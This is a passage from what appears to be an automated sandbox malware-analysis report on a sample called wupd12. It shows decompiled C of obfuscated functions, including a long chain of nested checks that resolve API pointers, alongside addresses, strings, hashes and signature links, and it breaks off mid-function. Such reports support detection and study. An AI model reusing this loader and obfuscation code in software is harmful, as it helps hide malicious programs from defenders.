				_v8 = _v8 ^ _t117 - 0x00001f73 & _a8;
				_a4 = _a4 + 0x1f73;
				 *(__ebx + 0x4034a4) = 0x1f73;
				_t96 = E004C4920((((__eax & 0x0000c2de) - 0x00007253 & 0x0000629a) + 0x00001f99 & _a4 & 0x0000d0e6 ^ 0x00002b11) + 0x4b93, __ebx,  *((intOrPtr*)(__ebx + 0x499440)),  *((intOrPtr*)(__ebx + 0x49943c)), _t125);
				_v8 = 0x8aa9;
				_v8 = _v8 - 1;
				_a8 = _a8 + 0x4c16;
				_a4 = _a4 - _t125;
				_v8 = _v8 ^ 0x00000000;
				 *(__ebx + 0x4034a4) = 0x626e;
				 *(__ebx + 0x4034a4) =  *(__ebx + 0x4034a4) & 0x00000000;
				_a4 = _a4 - 0x6a25;
				 *(__ebx + 0x4034a4) =  *(__ebx + 0x4034a4) + _t125;
				_v8 = _v8 | _t125;
				 *(__ebx + 0x4034a0) =  *(__ebx + 0x4034a0) - 1;
				_v8 = _v8 - _t125;
				_v8 = _t125;
				_v8 = _v8 + 1;
				_a4 = 0x79b2;
				 *(__ebx + 0x4034a4) =  *(__ebx + 0x4034a4) + 1;
				_v8 = _v8 | 0x00001f73;
				_v8 = 0x4d13;
				return ((((_t96 ^ 0x000096ef) - 0x000048da + 0x00000001 & 0x0000abeb ^ 0x00001a2e) & 0x0000e4a8) + 0x0000a20b - 0x0000da60 ^ 0x00000000) - 0x5847;
			}

0x004c8628
0x004c8632
0x004c8640
0x004c8641
0x004c8648
0x004c864b
0x004c8652
0x004c8656
0x004c8661
0x004c8689
0x004c8694
0x004c86a7
0x004c86b6
0x004c86bd
0x004c86c0
0x004c86c7
0x004c86d6
0x004c8700
0x004c870a
0x004c871a
0x004c8721
0x004c8727
0x004c872a
0x004c8731
0x004c8734
0x004c873a
0x004c8745
0x004c8751
0x004c875a
0x004c875d
0x004c8796

Strings

%j, xrefs: 004C871A
nb, xrefs: 004C8700
, xrefs: 004C864B
kF, xrefs: 004C86AF

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: $%j$kF$nb
API String ID: 0-3675986408
Opcode ID: 491ece14f26668f8eede4b54f10f78760de1d9268e98db7873e38b09784bc63c
Instruction ID: 88eea5a5fccf8551e9d6c7e04ba3d591c41e4e0a14e66931c711b60af1de769c
Opcode Fuzzy Hash: 491ece14f26668f8eede4b54f10f78760de1d9268e98db7873e38b09784bc63c
Instruction Fuzzy Hash: AF415E72D11605EFFB04CF65C64629EBBB4FF40325F24C16A9C09AE286C77C9B109B54

Uniqueness

Uniqueness Score: 100.00%

Function 004CBE83, Relevance: 5.1, Strings: 4, Instructions: 95
UNIQUECrypto

Download Yara Rule

C-Code - Quality: 100%

			E004CBE83(signed int __eax, void* __ebx, signed int _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _t110;
				signed int _t112;
				signed int _t114;
				signed int _t115;
				signed int _t125;
				signed int _t131;

				_a8 = _a8 - 1;
				_t114 = _t112 & _a8;
				 *((intOrPtr*)(__ebx + 0x40347c)) =  *((intOrPtr*)(__ebx + 0x40347c)) - 1;
				_a12 = _a12 + 1;
				_v16 = 0xa8f;
				_a12 = _a12 ^ 0x0000bc92;
				_a4 = _a4 ^ ((__eax ^ 0x000043fd) & 0x00000000) + 0x00002633;
				 *(__ebx + 0x403478) =  *(__ebx + 0x403478) ^ _t125;
				 *(__ebx + 0x403478) =  *(__ebx + 0x403478) | 0x0000c6d5;
				 *(__ebx + 0x403478) =  *(__ebx + 0x403478) - (_t131 & _v16 ^ _a4);
				_a12 = _a12 ^ 0x00006341;
				_a12 = _a12 & _t114;
				_v16 = _v16 ^ 0x000094b8;
				_v12 = _v12 & 0x0000d1f0;
				 *(__ebx + 0x403478) =  *(__ebx + 0x403478) & 0x00009166;
				_a8 = 0x9166;
				_t115 = _t114 + 0xd316;
				 *((intOrPtr*)(__ebx + 0x40347c)) =  *((intOrPtr*)(__ebx + 0x40347c)) - 0xc0f8;
				_v12 = _v12 ^ 0x0000f102;
				_a12 = _a12 + 0xccfe;
				 *(__ebx + 0x403478) = _t115;
				 *(__ebx + 0x403478) =  *(__ebx + 0x403478) - 0x4760;
				 *(__ebx + 0x403478) =  *(__ebx + 0x403478) ^ _t115;
				_v8 = _v8 & 0x00000000;
				_a8 = _a8 | 0x00002da0;
				_a12 = _a12 - 1;
				_t110 = 0x1aafc + _t115 - 0x0000950b + 0x00005f29 ^ 0x00004e08;
				 *(__ebx + 0x403478) =  *(__ebx + 0x403478) - 0x6ccd;
				 *((intOrPtr*)(__ebx + 0x40347c)) =  *((intOrPtr*)(__ebx + 0x40347c)) - 1;
				 *(__ebx + 0x403478) =  *(__ebx + 0x403478) - _t110;
				return _t110;
			}

0x004cbe8e
0x004cbea6
0x004cbecd
0x004cbed3
0x004cbed6
0x004cbee4
0x004cbeeb
0x004cbeee
0x004cbef4
0x004cbf13
0x004cbf19
0x004cbf2c
0x004cbf34
0x004cbf4e
0x004cbf5c
0x004cbf6e
0x004cbf71
0x004cbf7e
0x004cbf8b
0x004cbf92
0x004cbf9b
0x004cbfa4
0x004cbfba
0x004cbfc5
0x004cbfcf
0x004cbfdf
0x004cbfea
0x004cbfef
0x004cbffa
0x004cc003
0x004cc015

Strings

r', xrefs: 004CBF77
`G, xrefs: 004CBFA4
Dv, xrefs: 004CBEDD
Ac, xrefs: 004CBF19

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: Ac$Dv$`G$r'
API String ID: 0-1063789267
Opcode ID: f582c857a945c86d02c13856a05d0fe355ba8b4542b54c4607c29b462e190928
Instruction ID: 9dc1ac273ef2441b282b7d24bc4e48996d27e0c80566f8921fd3739c108c73ea
Opcode Fuzzy Hash: f582c857a945c86d02c13856a05d0fe355ba8b4542b54c4607c29b462e190928
Instruction Fuzzy Hash: 3C416D72D00204ABFB04CF71C98AB9A3BB5FF40315F19C16A9C59AE186D77C87649FA0

Uniqueness

Uniqueness Score: 100.00%

Function 00414979, Relevance: 4.6, APIs: 3, Instructions: 144UNIQUE

Download Yara Rule

APIs

CloseHandle.KERNEL32(004015B3,00401594,?,?,?,00401561,?), ref: 004015A9
AdjustWindowRect.USER32(?,?,?,00401561,?), ref: 004015F3
EnumChildWindows.USER32(004149BC,0041496F,430A2453,000022E8,00000000,00000000), ref: 00414986

Memory Dump Source

Source File: 00000005.00000002.595372430.00401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.595358303.00400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.595423095.00449000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wupd12.jbxd

Similarity

API ID: AdjustChildCloseEnumHandleRectWindowWindows
String ID:
API String ID: 2650954776-0
Opcode ID: 8bb6781447640ec135d697ff19eb32c4d092a287b935da6fa705af2198d11cac
Instruction ID: 9a0fca59ec550f6994db86a2fc515d11177e16adbd0b3e59c858e689cf29db21
Opcode Fuzzy Hash: 8bb6781447640ec135d697ff19eb32c4d092a287b935da6fa705af2198d11cac
Instruction Fuzzy Hash: BE51ACA148E3C06FC72387B48C656923FB0AF97344F1A04DBD4C19F0E3D2691829D36A

Uniqueness

Uniqueness Score: 100.00%

Function 004CA989, Relevance: 4.5, Strings: 3, Instructions: 748
UNIQUECrypto

Download Yara Rule

C-Code - Quality: 99%

			E004CA989(intOrPtr* __eax, void* __ebx, void* __ecx, signed int _a4, signed int _a8) {
				signed int _v0;
				signed int _v8;
				signed int _v12;
				signed int __edx;
				signed int __edi;
				signed int __esi;
				void* __ebp;
				intOrPtr* _t449;
				void* _t453;
				signed int _t456;
				void* _t459;
				signed int _t461;
				void* _t462;
				signed int _t465;

				_t449 = __eax;
				_t459 = __ecx - 1;
				 *__eax =  *__eax + __eax;
				if( *__eax != 0) {
					L1:
					_push(_t449);
					_push(_t459);
					_v8 = _v8 & 0;
					_t456 = 0 ^ _v0;
					_t461 = 0 + _a4;
					if(_t461 > 0) {
						_t456 = _t456 & _t461;
					}
					_t462 = 3;
					_t465 = 0xf00000;
					do {
						_v8 = _v8 + _t465;
						_t465 = _t465 << 4;
						_t462 = _t462 - 1;
					} while (_t462 != 0);
					_pop(_t453);
					return _t453;
				} else {
					 *((intOrPtr*)(__ebx + 0x499084)) =  *((intOrPtr*)(__ebx + 0x49940c))();
					__eax = __eax;
					__eflags =  *(__ebx + 0x499188);
					if( *(__ebx + 0x499188) != 0) {
						goto L1;
					} else {
						 *(__ebx + 0x499188) =  *((intOrPtr*)(__ebx + 0x499424))();
						__eax = __eax;
						__eflags =  *(__ebx + 0x49912c);
						if( *(__ebx + 0x49912c) != 0) {
							goto L1;
						} else {
							 *(__ebx + 0x49912c) =  *((intOrPtr*)(__ebx + 0x49940c))();
							__eflags =  *(__ebx + 0x49910c);
							if( *(__ebx + 0x49910c) != 0) {
								goto L1;
							} else {
								__eax =  *((intOrPtr*)(__ebx + 0x499424))();
								 *(__ebx + 0x49910c) = __eax;
								__ecx = __ecx;
								__eflags =  *(__ebx + 0x499124);
								if( *(__ebx + 0x499124) != 0) {
									goto L1;
								} else {
									 *(__ebx + 0x499124) =  *((intOrPtr*)(__ebx + 0x49940c))();
									__eax = __eax;
									__eflags =  *(__ebx + 0x4990cc);
									if( *(__ebx + 0x4990cc) != 0) {
										goto L1;
									} else {
										 *(__ebx + 0x4990cc) =  *((intOrPtr*)(__ebx + 0x499424))();
										__eax = __eax;
										__eflags =  *(__ebx + 0x499174);
										if( *(__ebx + 0x499174) != 0) {
											goto L1;
										} else {
											 *(__ebx + 0x499174) =  *((intOrPtr*)(__ebx + 0x49940c))();
											__eax = __eax;
											__eflags =  *(__ebx + 0x49906c);
											if( *(__ebx + 0x49906c) != 0) {
												goto L1;
											} else {
												 *(__ebx + 0x49906c) =  *((intOrPtr*)(__ebx + 0x499424))();
												__eax = __eax;
												__eflags =  *(__ebx + 0x499194);
												if( *(__ebx + 0x499194) != 0) {
													goto L1;
												} else {
													__eax =  *((intOrPtr*)(__ebx + 0x499424))();
													 *(__ebx + 0x499194) = __eax;
													__eflags =  *(__ebx + 0x499100);
													if( *(__ebx + 0x499100) != 0) {
														goto L1;
													} else {
														 *(__ebx + 0x499100) =  *((intOrPtr*)(__ebx + 0x49940c))();
														__eax = __eax;
														__eflags =  *(__ebx + 0x499108);
														if( *(__ebx + 0x499108) != 0) {
															goto L1;
														} else {
															 *(__ebx + 0x499108) =  *((intOrPtr*)(__ebx + 0x49940c))();
															__eflags =  *(__ebx + 0x4991a8);
															if( *(__ebx + 0x4991a8) != 0) {
																goto L1;
															} else {
																__eax =  *((intOrPtr*)(__ebx + 0x499424))();
																 *(__ebx + 0x4991a8) = __eax;
																__eflags =  *(__ebx + 0x499180);
																if( *(__ebx + 0x499180) != 0) {
																	goto L1;
																} else {
																	 *(__ebx + 0x499180) =  *((intOrPtr*)(__ebx + 0x499424))();
																	__eax = __eax;
																	__eflags =  *(__ebx + 0x499190);
																	if( *(__ebx + 0x499190) != 0) {
																		goto L1;
																	} else {
																		 *(__ebx + 0x499190) =  *((intOrPtr*)(__ebx + 0x499424))();
																		__eflags =  *(__ebx + 0x49905c);
																		if( *(__ebx + 0x49905c) != 0) {
																			goto L1;
																		} else {
																			__eax =  *((intOrPtr*)(__ebx + 0x499424))();
																			 *(__ebx + 0x49905c) = __eax;
																			__eflags =  *(__ebx + 0x4991a4);
																			if( *(__ebx + 0x4991a4) != 0) {
																				goto L1;
																			} else {
																				 *(__ebx + 0x4991a4) =  *((intOrPtr*)(__ebx + 0x49940c))();
																				__ecx = __ecx;
																				__eax = __eax;
																				__eflags =  *(__ebx + 0x499048);
																				if( *(__ebx + 0x499048) != 0) {
																					goto L1;
																				} else {
																					 *(__ebx + 0x499048) =  *((intOrPtr*)(__ebx + 0x499424))();
																					__eax = __eax;
																					__eflags =  *(__ebx + 0x49908c);
																					if( *(__ebx + 0x49908c) != 0) {
																						goto L1;
																					} else {
																						 *(__ebx + 0x49908c) =  *((intOrPtr*)(__ebx + 0x49940c))();
																						__eax = __eax;
																						__eflags =  *(__ebx + 0x499170);
																						if( *(__ebx + 0x499170) != 0) {
																							goto L1;
																						} else {
																							 *(__ebx + 0x499170) =  *((intOrPtr*)(__ebx + 0x49940c))();
																							__eax = __eax;
																							__eflags =  *(__ebx + 0x499120);
																							if( *(__ebx + 0x499120) != 0) {
																								goto L1;
																							} else {
																								 *(__ebx + 0x499120) =  *((intOrPtr*)(__ebx + 0x499424))();
																								__eflags =  *(__ebx + 0x499040);
																								if( *(__ebx + 0x499040) != 0) {
																									goto L1;
																								} else {
																									__eax =  *((intOrPtr*)(__ebx + 0x49940c))();
																									 *(__ebx + 0x499040) = __eax;
																									__ecx = __ecx;
																									__eflags =  *(__ebx + 0x499080);
																									if( *(__ebx + 0x499080) != 0) {
																										goto L1;
																									} else {
																										 *(__ebx + 0x499080) =  *((intOrPtr*)(__ebx + 0x499424))();
																										__eax = __eax;
																										__eflags =  *(__ebx + 0x499160);
																										if( *(__ebx + 0x499160) != 0) {
																											goto L1;
																										} else {
																											__eax =  *((intOrPtr*)(__ebx + 0x499424))();
																											 *(__ebx + 0x499160) = __eax;
																											__eflags =  *(__ebx + 0x499020);
																											if( *(__ebx + 0x499020) != 0) {
																												goto L1;
																											} else {
																												 *(__ebx + 0x499020) =  *((intOrPtr*)(__ebx + 0x499424))();
																												__eax = __eax;
																												__eflags =  *(__ebx + 0x49918c);
																												if( *(__ebx + 0x49918c) != 0) {
																													goto L1;
																												} else {
																													 *(__ebx + 0x49918c) =  *((intOrPtr*)(__ebx + 0x49940c))();
																													__ecx = __ecx;
																													__eax = __eax;
																													__eflags =  *(__ebx + 0x49902c);
																													if( *(__ebx + 0x49902c) != 0) {
																														goto L1;
																													} else {
																														 *(__ebx + 0x49902c) =  *((intOrPtr*)(__ebx + 0x499424))();
																														__ecx = __ecx;
																														__eax = __eax;
																														__eflags =  *(__ebx + 0x499164);
																														if( *(__ebx + 0x499164) != 0) {
																															goto L1;
																														} else {
																															__eax =  *((intOrPtr*)(__ebx + 0x499424))();
																															 *(__ebx + 0x499164) = __eax;
																															__eflags =  *(__ebx + 0x499128);
																															if( *(__ebx + 0x499128) != 0) {
																																goto L1;
																															} else {
																																 *(__ebx + 0x499128) =  *((intOrPtr*)(__ebx + 0x49940c))();
																																__ecx = __ecx;
																																__eax = __eax;
																																__eflags =  *(__ebx + 0x4990e8);
																																if( *(__ebx + 0x4990e8) != 0) {
																																	goto L1;
																																} else {
																																	__eax =  *((intOrPtr*)(__ebx + 0x499424))();
																																	 *(__ebx + 0x4990e8) = __eax;
																																	__eflags =  *(__ebx + 0x4990c8);
																																	if( *(__ebx + 0x4990c8) != 0) {
																																		goto L1;
																																	} else {
																																		 *(__ebx + 0x4990c8) =  *((intOrPtr*)(__ebx + 0x49940c))();
																																		__ecx = __ecx;
																																		__eax = __eax;
																																		__eflags =  *(__ebx + 0x49911c);
																																		if( *(__ebx + 0x49911c) != 0) {
																																			goto L1;
																																		} else {
																																			 *(__ebx + 0x49911c) =  *((intOrPtr*)(__ebx + 0x49940c))();
																																			__ecx = __ecx;
																																			__eax = __eax;
																																			__eflags =  *(__ebx + 0x499074);
																																			if( *(__ebx + 0x499074) != 0) {
																																				goto L1;
																																			} else {
																																				 *(__ebx + 0x499074) =  *((intOrPtr*)(__ebx + 0x499424))();
																																				__eflags =  *(__ebx + 0x499058);
																																				if( *(__ebx + 0x499058) != 0) {
																																					goto L1;
																																				} else {
																																					 *(__ebx + 0x499058) =  *((intOrPtr*)(__ebx + 0x49940c))();
																																					__eflags =  *(__ebx + 0x499198);
																																					if( *(__ebx + 0x499198) != 0) {
																																						goto L1;
																																					} else {
																																						__eax =  *((intOrPtr*)(__ebx + 0x499424))();
																																						 *(__ebx + 0x499198) = __eax;
																																						__eflags =  *(__ebx + 0x4990d0);
																																						if( *(__ebx + 0x4990d0) != 0) {
																																							goto L1;
																																						} else {
																																							 *(__ebx + 0x4990d0) =  *((intOrPtr*)(__ebx + 0x499424))();
																																							__edx = __edx;
																																							__ecx = __ecx;
																																							__eax = __eax;
																																							__eflags =  *(__ebx + 0x4990b0);
																																							if( *(__ebx + 0x4990b0) != 0) {
																																								goto L1;
																																							} else {
																																								 *(__ebx + 0x4990b0) =  *((intOrPtr*)(__ebx + 0x49940c))();
																																								__edx = __edx;
																																								__ecx = __ecx;
																																								__eax = __eax;
																																								__eflags =  *(__ebx + 0x49901c);
																																								if( *(__ebx + 0x49901c) != 0) {
																																									goto L1;
																																								} else {
																																									 *(__ebx + 0x49901c) =  *((intOrPtr*)(__ebx + 0x49940c))();
																																									__edx = __edx;
																																									__ecx = __ecx;
																																									__eax = __eax;
																																									__eflags =  *(__ebx + 0x499030);
																																									if( *(__ebx + 0x499030) != 0) {
																																										goto L1;
																																									} else {
																																										 *(__ebx + 0x499030) =  *((intOrPtr*)(__ebx + 0x499424))();
																																										__edx = __edx;
																																										__eflags =  *(__ebx + 0x4990a4);
																																										if( *(__ebx + 0x4990a4) != 0) {
																																											goto L1;
																																										} else {
																																											 *(__ebx + 0x4990a4) =  *((intOrPtr*)(__ebx + 0x49940c))();
																																											__eflags =  *(__ebx + 0x499118);
																																											if( *(__ebx + 0x499118) != 0) {
																																												goto L1;
																																											} else {
																																												__eax =  *((intOrPtr*)(__ebx + 0x499424))();
																																												 *(__ebx + 0x499118) = __eax;
																																												__eflags =  *(__ebx + 0x49917c);
																																												if( *(__ebx + 0x49917c) != 0) {
																																													goto L1;
																																												} else {
																																													 *(__ebx + 0x49917c) =  *((intOrPtr*)(__ebx + 0x499424))();
																																													__edx = __edx;
																																													__ecx = __ecx;
																																													__eax = __eax;
																																													__eflags =  *(__ebx + 0x4991b0);
																																													if( *(__ebx + 0x4991b0) != 0) {
																																														goto L1;
																																													} else {
																																														 *(__ebx + 0x4991b0) =  *((intOrPtr*)(__ebx + 0x499424))();
																																														__edx = __edx;
																																														__ecx = __ecx;
																																														__eax = __eax;
																																														__eflags =  *(__ebx + 0x4990bc);
																																														if( *(__ebx + 0x4990bc) != 0) {
																																															goto L1;
																																														} else {
																																															 *(__ebx + 0x4990bc) =  *((intOrPtr*)(__ebx + 0x499424))();
																																															__edx = __edx;
																																															__eflags =  *(__ebx + 0x499044);
																																															if( *(__ebx + 0x499044) != 0) {
																																																goto L1;
																																															} else {
																																																 *(__ebx + 0x499044) =  *((intOrPtr*)(__ebx + 0x499424))();
																																																__eflags =  *(__ebx + 0x4990f4);
																																																if( *(__ebx + 0x4990f4) != 0) {
																																																	goto L1;
																																																} else {
																																																	__eax =  *((intOrPtr*)(__ebx + 0x499424))();
																																																	 *(__ebx + 0x4990f4) = __eax;
																																																	__eflags =  *(__ebx + 0x4990a0);
																																																	if( *(__ebx + 0x4990a0) != 0) {
																																																		goto L1;
																																																	} else {
																																																		 *(__ebx + 0x4990a0) =  *((intOrPtr*)(__ebx + 0x499424))();
																																																		__edx = __edx;
																																																		__ecx = __ecx;
																																																		__eax = __eax;
																																																		__eflags =  *(__ebx + 0x49919c);
																																																		if( *(__ebx + 0x49919c) != 0) {
																																																			goto L1;
																																																		} else {
																																																			 *(__ebx + 0x49919c) =  *((intOrPtr*)(__ebx + 0x49940c))();
																																																			__edx = __edx;
																																																			__ecx = __ecx;
																																																			__eax = __eax;
																																																			__eflags =  *(__ebx + 0x499144);
																																																			if( *(__ebx + 0x499144) != 0) {
																																																				goto L1;
																																																			} else {
																																																				 *(__ebx + 0x499144) =  *((intOrPtr*)(__ebx + 0x499424))();
																																																				__edx = __edx;
																																																				__eflags =  *(__ebx + 0x4990a8);
																																																				if( *(__ebx + 0x4990a8) != 0) {
																																																					goto L1;
																																																				} else {
																																																					 *(__ebx + 0x4990a8) =  *((intOrPtr*)(__ebx + 0x49940c))();
																																																					__eflags =  *(__ebx + 0x49914c);
																																																					if( *(__ebx + 0x49914c) != 0) {
																																																						goto L1;
																																																					} else {
																																																						__eax =  *((intOrPtr*)(__ebx + 0x499424))();
																																																						 *(__ebx + 0x49914c) = __eax;
																																																						__eflags =  *(__ebx + 0x499064);
																																																						if( *(__ebx + 0x499064) != 0) {
																																																							goto L1;
																																																						} else {
																																																							 *(__ebx + 0x499064) =  *((intOrPtr*)(__ebx + 0x49940c))();
																																																							__edx = __edx;
																																																							__ecx = __ecx;
																																																							__eax = __eax;
																																																							__eflags =  *(__ebx + 0x4990ec);
																																																							if( *(__ebx + 0x4990ec) != 0) {
																																																								goto L1;
																																																							} else {
																																																								 *(__ebx + 0x4990ec) =  *((intOrPtr*)(__ebx + 0x49940c))();
																																																								__edx = __edx;
																																																								__ecx = __ecx;
																																																								__eax = __eax;
																																																								__eflags =  *(__ebx + 0x499158);
																																																								if( *(__ebx + 0x499158) != 0) {
																																																									goto L1;
																																																								} else {
																																																									 *(__ebx + 0x499158) =  *((intOrPtr*)(__ebx + 0x49940c))();
																																																									__eflags =  *(__ebx + 0x4990f0);
																																																									if( *(__ebx + 0x4990f0) != 0) {
																																																										goto L1;
																																																									} else {
																																																										 *(__ebx + 0x4990f0) =  *((intOrPtr*)(__ebx + 0x49940c))();
																																																										__eflags =  *(__ebx + 0x49907c);
																																																										if( *(__ebx + 0x49907c) != 0) {
																																																											goto L1;
																																																										} else {
																																																											 *(__ebx + 0x49907c) =  *((intOrPtr*)(__ebx + 0x499424))();
																																																											__eflags =  *(__ebx + 0x499184);
																																																											if( *(__ebx + 0x499184) != 0) {
																																																												goto L1;
																																																											} else {
																																																												__eax =  *((intOrPtr*)(__ebx + 0x499424))();
																																																												 *(__ebx + 0x499184) = __eax;
																																																												__eflags =  *(__ebx + 0x499014);
																																																												if( *(__ebx + 0x499014) != 0) {
																																																													goto L1;
																																																												} else {
																																																													 *(__ebx + 0x499014) =  *((intOrPtr*)(__ebx + 0x49940c))();
																																																													__ecx = __ecx;
																																																													__eax = __eax;
																																																													__eflags =  *(__ebx + 0x49913c);
																																																													if( *(__ebx + 0x49913c) != 0) {
																																																														goto L1;
																																																													} else {
																																																														 *(__ebx + 0x49913c) =  *((intOrPtr*)(__ebx + 0x49940c))();
																																																														__eflags =  *(__ebx + 0x4990d4);
																																																														if( *(__ebx + 0x4990d4) != 0) {
																																																															goto L1;
																																																														} else {
																																																															__eax =  *((intOrPtr*)(__ebx + 0x499424))();
																																																															 *(__ebx + 0x4990d4) = __eax;
																																																															__eflags =  *(__ebx + 0x499178);
																																																															if( *(__ebx + 0x499178) != 0) {
																																																																goto L1;
																																																															} else {
																																																																 *(__ebx + 0x499178) =  *((intOrPtr*)(__ebx + 0x499424))();
																																																																__eax = __eax;
																																																																__eflags =  *(__ebx + 0x4990fc);
																																																																if( *(__ebx + 0x4990fc) != 0) {
																																																																	goto L1;
																																																																} else {
																																																																	 *(__ebx + 0x4990fc) =  *((intOrPtr*)(__ebx + 0x49940c))();
																																																																	__eax = __eax;
																																																																	__eflags =  *(__ebx + 0x499024);
																																																																	if( *(__ebx + 0x499024) != 0) {
																																																																		goto L1;
																																																																	} else {
																																																																		 *(__ebx + 0x499024) =  *((intOrPtr*)(__ebx + 0x499424))();
																																																																		__eflags =  *(__ebx + 0x499088);
																																																																		if( *(__ebx + 0x499088) != 0) {
																																																																			goto L1;
																																																																		} else {
																																																																			 *(__ebx + 0x499088) =  *((intOrPtr*)(__ebx + 0x49940c))();
																																																																			__eflags =  *(__ebx + 0x4990c4);
																																																																			if( *(__ebx + 0x4990c4) != 0) {
																																																																				goto L1;
																																																																			} else {
																																																																				 *(__ebx + 0x4990c4) =  *((intOrPtr*)(__ebx + 0x49940c))();
																																																																				__eflags =  *(__ebx + 0x499134);
																																																																				if( *(__ebx + 0x499134) != 0) {
																																																																					goto L1;
																																																																				} else {
																																																																					 *(__ebx + 0x499134) =  *((intOrPtr*)(__ebx + 0x49940c))();
																																																																					__eflags =  *(__ebx + 0x499078);
																																																																					if( *(__ebx + 0x499078) != 0) {
																																																																						goto L1;
																																																																					} else {
																																																																						__eax =  *((intOrPtr*)(__ebx + 0x49940c))();
																																																																						 *(__ebx + 0x499078) = __eax;
																																																																						__eflags =  *(__ebx + 0x499150);
																																																																						if( *(__ebx + 0x499150) != 0) {
																																																																							goto L1;
																																																																						} else {
																																																																							 *(__ebx + 0x499150) =  *((intOrPtr*)(__ebx + 0x499424))();
																																																																							__ecx = __ecx;
																																																																							__eax = __eax;
																																																																							__eflags =  *(__ebx + 0x499114);
																																																																							if( *(__ebx + 0x499114) != 0) {
																																																																								goto L1;
																																																																							} else {
																																																																								 *(__ebx + 0x499114) =  *((intOrPtr*)(__ebx + 0x49940c))();
																																																																								__eflags =  *(__ebx + 0x499130);
																																																																								if( *(__ebx + 0x499130) != 0) {
																																																																									goto L1;
																																																																								} else {
																																																																									 *(__ebx + 0x499130) =  *((intOrPtr*)(__ebx + 0x499424))();
																																																																									__eflags =  *(__ebx + 0x49903c);
																																																																									if( *(__ebx + 0x49903c) != 0) {
																																																																										goto L1;
																																																																									} else {
																																																																										 *(__ebx + 0x49903c) =  *((intOrPtr*)(__ebx + 0x499424))();
																																																																										__edx = __edx;
																																																																										__eflags =  *(__ebx + 0x499104);
																																																																										if( *(__ebx + 0x499104) != 0) {
																																																																											goto L1;
																																																																										} else {
																																																																											 *(__ebx + 0x499104) =  *((intOrPtr*)(__ebx + 0x499424))();
																																																																											__eflags =  *(__ebx + 0x499028);
																																																																											if( *(__ebx + 0x499028) != 0) {
																																																																												goto L1;
																																																																											} else {
																																																																												 *(__ebx + 0x499028) =  *((intOrPtr*)(__ebx + 0x49940c))();
																																																																												__eflags =  *(__ebx + 0x499138);
																																																																												if( *(__ebx + 0x499138) != 0) {
																																																																													goto L1;
																																																																												} else {
																																																																													__eax =  *((intOrPtr*)(__ebx + 0x499424))();
																																																																													 *(__ebx + 0x499138) = __eax;
																																																																													__eflags =  *(__ebx + 0x4990e0);
																																																																													if( *(__ebx + 0x4990e0) != 0) {
																																																																														goto L1;
																																																																													} else {
																																																																														 *(__ebx + 0x4990e0) =  *((intOrPtr*)(__ebx + 0x499424))();
																																																																														__ecx = __ecx;
																																																																														__eax = __eax;
																																																																														__eflags =  *(__ebx + 0x49900c);
																																																																														if( *(__ebx + 0x49900c) != 0) {
																																																																															goto L1;
																																																																														} else {
																																																																															 *(__ebx + 0x49900c) =  *((intOrPtr*)(__ebx + 0x49940c))();
																																																																															__edx = __edx;
																																																																															__eflags =  *(__ebx + 0x499094);
																																																																															if( *(__ebx + 0x499094) != 0) {
																																																																																goto L1;
																																																																															} else {
																																																																																 *(__ebx + 0x499094) =  *((intOrPtr*)(__ebx + 0x49940c))();
																																																																																__eflags =  *(__ebx + 0x499090);
																																																																																if( *(__ebx + 0x499090) != 0) {
																																																																																	goto L1;
																																																																																} else {
																																																																																	 *(__ebx + 0x499090) =  *((intOrPtr*)(__ebx + 0x499424))();
																																																																																	__eflags =  *(__ebx + 0x4990d8);
																																																																																	if( *(__ebx + 0x4990d8) != 0) {
																																																																																		goto L1;
																																																																																	} else {
																																																																																		 *(__ebx + 0x4990d8) =  *((intOrPtr*)(__ebx + 0x499424))();
																																																																																		__eflags =  *(__ebx + 0x499038);
																																																																																		if( *(__ebx + 0x499038) != 0) {
																																																																																			goto L1;
																																																																																		} else {
																																																																																			__eax =  *((intOrPtr*)(__ebx + 0x499424))();
																																																																																			 *(__ebx + 0x499038) = __eax;
																																																																																			__eflags =  *(__ebx + 0x499010);
																																																																																			if( *(__ebx + 0x499010) != 0) {
																																																																																				goto L1;
																																																																																			} else {
																																																																																				 *(__ebx + 0x499010) =  *((intOrPtr*)(__ebx + 0x499424))();
																																																																																				__ecx = __ecx;
																																																																																				__eax = __eax;
																																																																																				__eflags =  *(__ebx + 0x4991ac);
																																																																																				if( *(__ebx + 0x4991ac) != 0) {
																																																																																					goto L1;
																																																																																				} else {
																																																																																					 *(__ebx + 0x4991ac) =  *((intOrPtr*)(__ebx + 0x49940c))();
																																																																																					__edx = __edx;
																																																																																					__eflags =  *(__ebx + 0x4990dc);
																																																																																					if( *(__ebx + 0x4990dc) != 0) {
																																																																																						goto L1;
																																																																																					} else {
																																																																																						 *(__ebx + 0x4990dc) =  *((intOrPtr*)(__ebx + 0x499424))();
																																																																																						__eflags =  *(__ebx + 0x499060);
																																																																																						if( *(__ebx + 0x499060) != 0) {
																																																																																							goto L1;
																																																																																						} else {
																																																																																							 *(__ebx + 0x499060) =  *((intOrPtr*)(__ebx + 0x49940c))();
																																																																																							__eflags =  *(__ebx + 0x499018);
																																																																																							if( *(__ebx + 0x499018) != 0) {
																																																																																								goto L1;
																																																																																							} else {
																																																																																								 *(__ebx + 0x499018) =  *((intOrPtr*)(__ebx + 0x49940c))();
																																																																																								__eflags =  *(__ebx + 0x499168);
																																																																																								if( *(__ebx + 0x499168) != 0) {
																																																																																									goto L1;
																																																																																								} else {
																																																																																									__eax =  *((intOrPtr*)(__ebx + 0x49940c))();
																																																																																									 *(__ebx + 0x499168) = __eax;
																																																																																									__eflags =  *(__ebx + 0x499050);
																																																																																									if( *(__ebx + 0x499050) != 0) {
																																																																																										goto L1;
																																																																																									} else {
